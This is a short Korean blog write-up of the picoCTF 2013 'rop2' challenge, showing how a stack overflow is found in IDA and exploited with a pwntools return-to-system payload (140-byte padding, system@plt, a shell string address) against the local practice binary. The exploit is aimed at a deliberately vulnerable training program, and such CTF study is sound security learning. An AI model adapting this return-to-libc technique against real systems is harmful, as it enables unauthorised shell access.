[pico CTF 2013] rop2
2018. 8. 16. 07:34ㆍCTF's Write-up
pico CTF 2013 ROP2번문제입니다.
보호기법 체크하기!
IDA로 까서 취약점을 찾아보겠습니다.
이전문제하고 똑같은 취약점이군요 ㅎㅎ
쉽게 풀릴 것 같아서 not_called함수로 들어가보겠습니다.
어라... "/bin/bash"가 아니라 "/bin/data"로 바뀌어있네요.
당황 ㅋㅋㅋㅋ
조금더 살펴보니 system함수를 내부에서 호출하니, system함수로 ret를 주고, 인자로 "/bin/sh"를 주면 될 것 같습니다.
system주소 찾고,
"/bin/bash"가젯 찾고,
payload 작성하면?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | from pwn import * r = process("./rop2") system_plt = 0x80483a0 shell = 0x08048610 payload = "" payload += "A"*140 payload += p32(system_plt) payload += "AAAA" payload += p32(shell) r.send(payload) r.interactive() | cs |
(grin)
'CTF's Write-up' 카테고리의 다른 글
[pico CTF 2013] rop4 (0) | 2018.08.16 |
---|---|
[pico CTF 2013] rop3 (0) | 2018.08.16 |
[TJCTF2018] - Cookie monster (0) | 2018.08.16 |
[pico CTF 2013] rop1 (0) | 2018.08.15 |
[TJCTF2018] - Weird Logo (0) | 2018.08.15 |